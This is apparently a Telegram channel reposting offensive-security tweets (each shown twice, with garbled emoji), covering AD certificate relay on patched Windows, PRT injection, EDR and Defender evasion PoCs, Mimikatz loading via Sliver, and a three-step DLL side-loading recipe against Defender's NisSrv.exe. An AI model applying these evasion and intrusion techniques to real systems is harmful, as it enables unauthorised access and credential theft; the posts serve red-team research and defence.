πΉ [ snovvcrash, snπ₯Άvvcrπ₯sh ]
π§΅ (3/x) But guess what, thereβs another super cool tool β Coercer (by @podalirius_) β which can be used to trigger the authentication with a different API that is not affected by the ad-hoc check provided in the patch β¬
π₯ [ tweet ]
π§΅ (3/x) But guess what, thereβs another super cool tool β Coercer (by @podalirius_) β which can be used to trigger the authentication with a different API that is not affected by the ad-hoc check provided in the patch β¬
π₯ [ tweet ]
πΉ [ snovvcrash, snπ₯Άvvcrπ₯sh ]
π§΅ (4/x) And now *tada* I can get my machine account certificate on a fully patched Windows 10 β¬
π₯ [ tweet ]
π§΅ (4/x) And now *tada* I can get my machine account certificate on a fully patched Windows 10 β¬
π₯ [ tweet ]
πΉ [ snovvcrash, snπ₯Άvvcrπ₯sh ]
π§΅ (5/x) Check out @Flangvikβs stream to know more about ADCSPwn usage: https://t.co/nG8gRKo3rn
π https://youtu.be/W9pUCVxe59Q
π₯ [ tweet ]
π§΅ (5/x) Check out @Flangvikβs stream to know more about ADCSPwn usage: https://t.co/nG8gRKo3rn
π https://youtu.be/W9pUCVxe59Q
π₯ [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
π [ _dirkjan, Dirk-jan ]
Working on some tooling, and managed to get PRT injection during browser sign-in working with Selenium. If you steal a PRT from a hybrid/compliant device, you can use this to "upgrade" the sign-in of other users, to comply with conditional access policies requiring this status.
π₯ [ tweet ]
Working on some tooling, and managed to get PRT injection during browser sign-in working with Selenium. If you steal a PRT from a hybrid/compliant device, you can use this to "upgrade" the sign-in of other users, to comply with conditional access policies requiring this status.
π₯ [ tweet ]
π [ m3g9tr0n, Spiros Fraganastasis ]
Similar to Petitpotam, the netdfs service is enabled in Windows Server and AD environments, and the abused RPC method allows privileged processes to access malicious pipes for exploitation https://t.co/DtcR08PDTN
π https://github.com/crisprss/magicNetdefs
π₯ [ tweet ]
Similar to Petitpotam, the netdfs service is enabled in Windows Server and AD environments, and the abused RPC method allows privileged processes to access malicious pipes for exploitation https://t.co/DtcR08PDTN
π https://github.com/crisprss/magicNetdefs
π₯ [ tweet ]
π [ d4rckh, d4rckh ]
btw, i made a very simple http redirector (also in nim) which can be used with probably any c2 you can imagine
https://t.co/GMfRMpXrSV #redteam
π https://github.com/d4rckh/http-redirector
π₯ [ tweet ]
btw, i made a very simple http redirector (also in nim) which can be used with probably any c2 you can imagine
https://t.co/GMfRMpXrSV #redteam
π https://github.com/d4rckh/http-redirector
π₯ [ tweet ]
π [ tifkin_, Lee Christensen ]
Users password/doc syncing in corporate environments is dangerous. I've seen many corporate users - particularly IT admins - with Chrome Password sync enabled or Last/pass/1pass installed.
The home computer the DA password is synced to that their kids use doesn't have <FancyEDR>
π₯ [ tweet ]
Users password/doc syncing in corporate environments is dangerous. I've seen many corporate users - particularly IT admins - with Chrome Password sync enabled or Last/pass/1pass installed.
The home computer the DA password is synced to that their kids use doesn't have <FancyEDR>
π₯ [ tweet ]
π [ vinopaljiri, JiΕΓ Vinopal ]
Using #Powershell based on .NET >= 5 or .NET Core (so also latest Powershell Linux/Windows) you can easily natively manipulate with PE and do things like in the picture below (ML processing of .data section strings using #StringSifter) πππ
π₯ [ tweet ]
Using #Powershell based on .NET >= 5 or .NET Core (so also latest Powershell Linux/Windows) you can easily natively manipulate with PE and do things like in the picture below (ML processing of .data section strings using #StringSifter) πππ
π₯ [ tweet ]
π [ an0n_r0, an0n ]
had to fix couple of bugs of the sideload cmd in Sliver, but now it loads Mimikatz DLL (using Donut behind the scenes) and even bypasses Defender without much effort. it is still not perfect, output fetching is not working for some reason, but it is almost functional.
π₯ [ tweet ]
had to fix couple of bugs of the sideload cmd in Sliver, but now it loads Mimikatz DLL (using Donut behind the scenes) and even bypasses Defender without much effort. it is still not perfect, output fetching is not working for some reason, but it is almost functional.
π₯ [ tweet ]
π [ NinjaParanoid, Chetan Nayak (Brute Ratel C4) ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
π https://www.youtube.com/watch?v=qakZwswi5Jw
π₯ [ tweet ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
π https://www.youtube.com/watch?v=qakZwswi5Jw
π₯ [ tweet ]
π [ ORCA10K, ORCA ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
π https://gitlab.com/ORCA000/perunsfart
π₯ [ tweet ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
π https://gitlab.com/ORCA000/perunsfart
π₯ [ tweet ]
π [ BlWasp_, BlackWasp ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
π https://github.com/Porchetta-Industries/CrackMapExec/pull/610
π₯ [ tweet ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
π https://github.com/Porchetta-Industries/CrackMapExec/pull/610
π₯ [ tweet ]
π [ HuskyHacksMK, Matt | HuskyHacks ]
π¬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
πLesson: https://t.co/cIuqUKd4Fw
π¦ Lab Repo: https://t.co/apbskSMBkY
π https://notes.huskyhacks.dev/notes/on-patching-binaries
π https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
π₯ [ tweet ]
π¬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
πLesson: https://t.co/cIuqUKd4Fw
π¦ Lab Repo: https://t.co/apbskSMBkY
π https://notes.huskyhacks.dev/notes/on-patching-binaries
π https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
π₯ [ tweet ]
π [ httpyxel, yxel ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
π https://github.com/janoglezcampos/DeathSleep
π₯ [ tweet ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
π https://github.com/janoglezcampos/DeathSleep
π₯ [ tweet ]
π [ DirectoryRanger, DirectoryRanger ]
Good series by @martinsohndk:
π https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
π₯ [ tweet ]
Good series by @martinsohndk:
π https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
π https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
π₯ [ tweet ]
π [ ShitSecure, S3cur3Th1sSh1t ]
Really like the βMalware Devβ posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics ππ₯
https://t.co/iRl72r4yz9
π https://0xpat.github.io/
π₯ [ tweet ]
Really like the βMalware Devβ posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics ππ₯
https://t.co/iRl72r4yz9
π https://0xpat.github.io/
π₯ [ tweet ]
π [ podalirius_, Podalirius ]
[#thread π§΅] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! π
https://t.co/EOWfTbFCRh
π https://github.com/p0dalirius/ApacheTomcatScanner/
π₯ [ tweet ]
[#thread π§΅] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! π
https://t.co/EOWfTbFCRh
π https://github.com/p0dalirius/ApacheTomcatScanner/
π₯ [ tweet ]
π [ mariuszbit, mgeeky | Mariusz Banach ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access π₯
π₯ [ tweet ][ quote ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access π₯
π₯ [ tweet ][ quote ]